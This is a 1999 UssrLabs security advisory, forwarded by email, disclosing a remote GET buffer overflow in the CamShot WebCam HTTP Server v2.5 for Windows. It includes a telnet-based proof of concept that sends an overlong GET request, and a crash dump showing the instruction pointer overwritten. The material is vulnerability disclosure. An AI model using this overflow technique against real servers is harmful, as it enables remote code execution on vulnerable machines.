CamShot is a Windows 95/98/NT web server that serves up web pages containing time stamped images captured from a video camera. The images can be viewed from anywhere on the network with a web browser. UssrLabs found a Local / Remote Buffer overflow, The code that handles GET commands has an unchecked buffer that will allow arbitrary code to be executed if it is overflowed.
f179a5f67d4a3699e41fea3f876e418d1c1298f43b98efb499e0052e8832b256
---------- Forwarded message ----------
From: "Ussr Labs" <labs@ussrback.com>
To: "TECHNOTRONIC" <news@technotronic.com>
Subject: Local / Remote GET Buffer Overflow Vulnerability in CamShot WebC=
am HTTP Server v2.5 for Win9x/NT
Date: Thu, 30 Dec 1999 14:04:14 -0300
Local / Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
Server v2.5 for Win9x/NT
USSR Advisory Code: USSR-99028
Release Date:
December 30, 1999 [4/5]
Systems Affected:
CamShot WebCam HTTP Server v2.5 for Win9x and possibly others versions.
About The Software:
CamShot is a Windows 95/98/NT web server that serves up web pages contain=
ing
time
stamped images captured from a video camera. The images can be viewed fro=
m
anywhere
on the network with a web browser. CamShot works with =91Video For Window=
s
compatible
video equipment. Finally a cheap and simple way to do remote surveillance=
is
here!.
THE PROBLEM
UssrLabs found a Local / Remote Buffer overflow, The code that handles GE=
T
commands
has an unchecked buffer that will allow arbitrary code to be executed if =
it
is overflowed.
Do you do the w00w00?
This advisory also acts as part of w00giving. This is another contributio=
n
to w00giving for all you w00nderful people out there. You do know what
w00giving is don't you? http://www.w00w00.org/advisories.html
Example
[hell@imahacker]$ telnet die.communitech.net 80
Trying example.com...
Connected to die.communitech.net
Escape character is '^]'.
GET (buffer) HTTP/1.1 <enter><enter>
Where [buffer] is aprox. 2000 characters. At his point the server overflo=
ws.
And in remote machine someone will be see something like this.
CAMSHOT caused an invalid page fault in
module <unknown> at 0000:61616161.
Registers:
EAX=3D0069fa74 CS=3D017f EIP=3D61616161 EFLGS=3D00010246
EBX=3D0069fa74 SS=3D0187 ESP=3D005a0038 EBP=3D005a0058
ECX=3D005a00dc DS=3D0187 ESI=3D816238f4 FS=3D33ff
EDX=3Dbff76855 ES=3D0187 EDI=3D005a0104 GS=3D0000
Bytes at CS:EIP:
Stack dump:
bff76849 005a0104 0069fa74 005a0120 005a00dc 005a0210 bff76855 0069fa74
005a00ec bff87fe9 005a0104 0069fa74 005a0120 005a00dc 61616161 005a02c8
Binary or source for this Exploit (wen we finish it):
http://www.ussrback.com/
Vendor Status:
Informed.
Vendor Url: http://www.broadgun.com/arcit/index.html
Program Url: http://broadgun.com/Camshot.htm
Credit: USSRLABS
SOLUTION
Noting yet.
Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, ADM, L0pht, HNN, Technotronic an=
d
Wiretrip.
u n d e r g r o u n d s e c u r i t y s y s t e m s r e s e a r c h
http://www.ussrback.com